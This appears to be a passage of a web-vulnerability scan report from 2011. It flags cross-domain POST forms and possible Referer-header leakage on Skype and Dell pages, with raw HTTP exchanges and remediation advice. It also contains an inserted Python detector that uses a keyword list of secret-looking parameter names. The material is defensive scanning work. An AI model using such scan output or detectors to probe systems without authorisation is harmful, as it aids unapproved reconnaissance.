HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 136114 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /mac/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:05 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 54709 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /pl/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:18 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58234 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /play/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:04 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 52934 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /pt/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:16 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58394 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /ru/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58654 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /security/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:07 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 52462 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /zh-Hans/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 50254 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /zh-Hant/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:20 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60218 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hant" lang="zh-Hant">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations (browser history, proxy and web server logs, third-party analytics) and may be visible on-screen to untrusted parties. Where a page must link to, or load resources from, domains it does not fully trust, a Referrer-Policy response header (for example no-referrer or strict-origin-when-cross-origin) and rel="noreferrer" on individual links limit what current browsers send; treat these as defence in depth, not as a substitute for keeping secrets out of the URL.
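The following is an added example, not part of the original scan report and not Burp's own check logic. It re-implements offline the two checks whose instances appear in this report: forms that POST to another domain (the feedburner.google.com instances above, which list the fields email, uri and loc) and links to other domains on a page whose own URL carries sensitive-looking query parameters (the Referer leakage issue just described). The sample page is constructed; the sessionid parameter, the FeedBurner action path and the list of sensitive parameter-name fragments are assumptions.

```python
# Added example (not part of the scan report, not Burp's check logic):
# offline re-implementation of "cross-domain POST form" and
# "cross-domain Referer leakage" detection over a constructed page.
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit

# Parameter-name fragments treated as sensitive: an assumption for the example.
SENSITIVE_PARAM_HINTS = ("session", "sessid", "token", "auth", "sid", "password", "passwd")


class _Collector(HTMLParser):
    """Collects form actions/fields and outbound URLs from an HTML document."""

    def __init__(self):
        super().__init__()
        self.forms = []     # {"action": str, "method": str, "fields": [names]}
        self.urls = []      # href/src values of a, img, script, iframe
        self._form = None   # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").upper(),
                          "fields": []}
            self.forms.append(self._form)
        elif tag in ("input", "select", "textarea") and self._form is not None:
            if a.get("name"):
                self._form["fields"].append(a["name"])
        elif tag == "a" and a.get("href"):
            self.urls.append(a["href"])
        elif tag in ("img", "script", "iframe") and a.get("src"):
            self.urls.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def cross_domain_post_forms(page_url, html):
    """Forms whose resolved action is a POST to a host other than the page's."""
    c = _Collector()
    c.feed(html)
    origin = _host(page_url)
    found = []
    for f in c.forms:
        target = urljoin(page_url, f["action"])   # relative actions stay on-site
        if f["method"] == "POST" and _host(target) != origin:
            found.append({"domain": _host(target), "fields": f["fields"]})
    return found


def cross_domain_links(page_url, html):
    """Absolute URLs on other hosts that a browser would fetch or follow,
    sending the page URL in the Referer header."""
    c = _Collector()
    c.feed(html)
    origin = _host(page_url)
    targets = []
    for u in c.urls:
        target = urljoin(page_url, u)
        if _host(target) and _host(target) != origin and target not in targets:
            targets.append(target)
    return targets


def sensitive_query_params(page_url):
    """Query parameter names on the page URL that look like secrets."""
    names = [k for k, _ in parse_qsl(urlsplit(page_url).query, keep_blank_values=True)]
    return [n for n in names if any(h in n.lower() for h in SENSITIVE_PARAM_HINTS)]


def referer_leakage(page_url, html):
    """Cross-domain targets plus sensitive URL parameters; the issue is only
    real when both lists are non-empty."""
    targets = cross_domain_links(page_url, html)
    params = sensitive_query_params(page_url)
    return {"leaks": bool(targets and params), "targets": targets, "sensitive_params": params}


# Constructed sample input shaped like the blogs.skype.com responses above
# (cross-domain subscription form, footer link, tracking pixel). The
# sessionid parameter and the FeedBurner action path are assumptions.
SAMPLE_PAGE_URL = "http://blogs.skype.com/en/mobile/?sessionid=abc123"
SAMPLE_HTML = """<html><body>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post">
  <input type="text" name="email">
  <input type="hidden" name="uri" value="SkypeBlogs">
  <input type="hidden" name="loc" value="en_US">
</form>
<a href="/en/windows/">Windows</a>
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a></div>
<noscript><img src="http://ad.doubleclick.net/activity;src=1305124" width="1" height="1"></noscript>
</body></html>"""

if __name__ == "__main__":
    print(cross_domain_post_forms(SAMPLE_PAGE_URL, SAMPLE_HTML))
    print(referer_leakage(SAMPLE_PAGE_URL, SAMPLE_HTML))
```

The same-site link (/en/windows/) resolves to the page's own host and is ignored; the tracking pixel counts as a cross-domain target because an image load carries the Referer just as a clicked link does. Without a sensitive parameter on the page URL, referer_leakage reports targets but leaks is False, which matches the report's advice to review what is actually in the URL before treating every outbound link as a finding.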
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/DellPartsFamily.aspx?=us&cs=04&l=en&s=bsd&~topic=sna_parts_supplies&~ck=mn&category_id=7566&redirect=1&~ck=mn HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell C ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/ShopAllBrands.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 166411 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:28 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:28 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop B ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/batteryconfig.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Batter ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
Request
GET /sna/category.aspx?c=us&category_id=4014&cs=04&l=en&navla=26973~0~251106&nf=26973~0~251106&s=bsd HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 129649 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:14 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:14 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]... <noscript> <img src="http://ad.doubleclick.net/activity;src=1305124;type=smbej903;cat=print870;ord=0123456789?" width="1" height="1" border="0" alt=""> </noscript> ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
Request
GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 88780 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/ Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/ Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]... <noscript> <img src="http://ad.doubleclick.net/activity;src=1305124;type=smbej903;cat=enaho928;ord=0123456789?" width="1" height="1" border="0" alt=""> </noscript> ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/memconfig.aspx?c=us&l=en&cs=04 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 31314 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:59 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4 HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34516 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:21 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:20 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
The response contains the following link to another domain:
http://www.ideastorm.com/
Request
GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_colorlasers_single_function HTTP/1.1 Host: accessories.us.dell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62202 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:23 GMT; path=/ Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" Date: Sun, 04 Sep 2011 16:29:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop a ...[SNIP]... <div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a> ...[SNIP]...
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 04 Sep 2011 16:17:10 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=ISO-8859-1 X-Content-Type-Options: nosniff Server: cafe Content-Length: 8146 X-XSS-Protection: 1; mode=block
<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 19 11:02:06 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> ...[SNIP]... ww.wallstreetoasis.com/forums/houlihan-lokey-exit-opps/pubclick//Martini/hertz_goldplusrewar_080111_387/pos/Right/page/wallstreetoasis.com/ROS/L23/ord/1747216000%3Fhttp://www.hertzgoldplusrewards.com"><img src="http://s0.2mdn.net/1868452/1-Hertz_GoldPlusAd_Chrysler_160x600_StaticBackup.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a> ...[SNIP]...
document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b79/0/0/%2a/h;245605273;0-0;0;65085238;1-468/60;43346931/43364718/1;;~sscs=%3fhttp://www.ironspeed.com/AspAllianceHome.aspx"><img src="http://s0.2mdn.net/viewad/3229814/IronSpeed_468x60.gif" border=0 alt="Click here to find out more!"></a> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<img class="" title="Contains a hyperlink" alt="Message contains a hyperlink" id="display_49" src="http://skypec.i.lithium.com/skins/images/7D583AE19CE6D8C6CC84B9FA3A1F76F9/base/images/message_has_url.png"/> <img class="" title="Contains an image" alt="Message contains an image" id="display_50" src="http://skypec.i.lithium.com/skins/images/C3D20F2A59CAAA47A2D42860BB95C6C1/base/images/message_has_image.png"/>
</div> ...[SNIP]... <div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo"> <a class="lia-link-navigation" title="Social CRM & Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM & Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_51" src="http://skypec.i.lithium.com/skins/images/7CE6893D65E55F411F0162C285E0145B/base/images/button_lithium_logo.png"/></a> ...[SNIP]... </a>
Request
GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>